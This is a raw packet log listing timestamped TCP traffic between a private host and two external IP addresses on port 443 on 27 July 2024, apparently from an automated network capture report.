Jul 27, 2024 07:44:07.232706070 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232728958 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232733965 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232867956 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232909918 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232924938 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232932091 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232960939 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232979059 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233087063 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233128071 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233150005 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233155012 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233181000 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233201981 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233305931 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233352900 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233376980 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233382940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233406067 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233417034 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233515978 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233556032 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233583927 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233588934 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233616114 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233624935 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233699083 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233736038 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233778000 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233793974 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233800888 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233833075 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233844995 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.233954906 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.233994961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.234014988 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.234020948 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.234031916 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.234054089 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.234139919 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.234183073 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.234196901 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.234206915 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.234234095 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.234249115 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.234731913 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.234777927 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.234795094 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.234802008 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.234814882 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.234839916 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.234839916 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.234951019 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.234991074 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235011101 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235016108 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235038996 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235050917 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235167027 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235219955 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235239983 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235245943 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235270023 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235275984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235594034 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235641003 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235666037 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235671997 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235697985 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235703945 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235819101 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235869884 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235882998 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235893965 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.235927105 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.235946894 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236083984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236121893 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236143112 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236149073 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236161947 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236181021 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236190081 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236270905 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236318111 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236331940 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236340046 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236367941 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236380100 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236641884 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236684084 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236706018 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236711025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236731052 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236749887 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236860991 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236912012 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236927032 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236933947 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.236960888 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.236972094 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.237082958 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.237129927 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.237144947 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.237150908 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.237178087 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.237191916 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.237411022 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.237452984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.237468004 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.237476110 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.237538099 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.247728109 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.264344931 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.264395952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.264409065 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.264421940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.264439106 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.264451027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.264652014 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.264699936 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.264709949 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.264725924 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.264748096 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.264760017 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.264872074 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.264923096 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.264930010 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.264945984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.264970064 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.264981031 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.289239883 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.304337025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.304399967 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.304435968 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.304442883 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.304483891 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.304492950 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.304641962 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.304691076 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.304709911 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.304717064 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.304747105 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.304755926 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.304858923 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.304903030 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.304908037 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.304934025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.304965019 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.304987907 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.306895018 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.310635090 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.310689926 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.310702085 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.310713053 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.310740948 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.310750961 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.311882019 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.311927080 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.311927080 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.311954975 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.311960936 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.311980963 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.311997890 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.312161922 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.352113008 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.352164030 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.352185965 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.352191925 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.352216005 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.352232933 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.352410078 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.352453947 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.352469921 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.352478027 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.352505922 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.352510929 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.352699995 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.352742910 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.352754116 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.352766037 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.352802992 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.352823973 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.392781973 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.392834902 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.392855883 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.392863989 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.392888069 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.392901897 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.393013954 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.393062115 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.393081903 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.393089056 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.393098116 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.393124104 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.393209934 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.393250942 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.393268108 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.393275976 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.393302917 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.393320084 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.398588896 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.398628950 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.398659945 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.398665905 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.398694992 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.398705006 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.401731014 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.401774883 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.401791096 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.401797056 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.401822090 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.401839972 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.422954082 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:07.423043966 CEST	62253	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:07.425426960 CEST	62253	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:07.425456047 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:07.425510883 CEST	62253	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:07.425522089 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:07.426007986 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:07.426295042 CEST	62253	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:07.426345110 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:07.440615892 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.440659046 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.440687895 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.440692902 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.440718889 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.440730095 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.440790892 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.440836906 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.440857887 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.440864086 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.440886021 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.440907001 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.441349030 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.441390038 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.441410065 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.441415071 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.441442013 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.441453934 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.479610920 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.479654074 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.479686975 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.479698896 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.479732037 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.479742050 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.480170965 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.480226040 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.480257034 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.480262041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.480288029 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.480305910 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.480401039 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.480441093 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.480458021 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.480464935 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.480496883 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.480508089 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.485960960 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.486007929 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.486025095 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.486032009 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.486057043 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.486074924 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.489787102 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.489825964 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.489852905 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.489881039 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.489911079 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.489923954 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.528892994 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.528938055 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.528966904 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.528989077 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.529000998 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.529025078 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.529103041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.529141903 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.529155970 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.529162884 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.529187918 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.529201984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.529282093 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.529330015 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.529366016 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.529372931 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.529381990 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.529403925 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.567670107 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.567708969 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.567734957 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.567745924 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.567771912 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.567789078 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.567982912 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.568023920 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.568044901 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.568049908 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.568074942 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.568094969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.568295956 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.568334103 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.568345070 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.568360090 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.568418980 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.574089050 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.574130058 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.574161053 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.574168921 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.574194908 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.574203014 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.577651024 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.577689886 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.577704906 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.577714920 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.577729940 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.577754021 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.615295887 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.615344048 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.615355015 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.615366936 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.615398884 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.615412951 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.616446018 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.616509914 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.616528034 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.616583109 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.616833925 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.616874933 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.616918087 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.616925001 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.616954088 CEST	62252	443	192.168.2.4	185.149.100.242
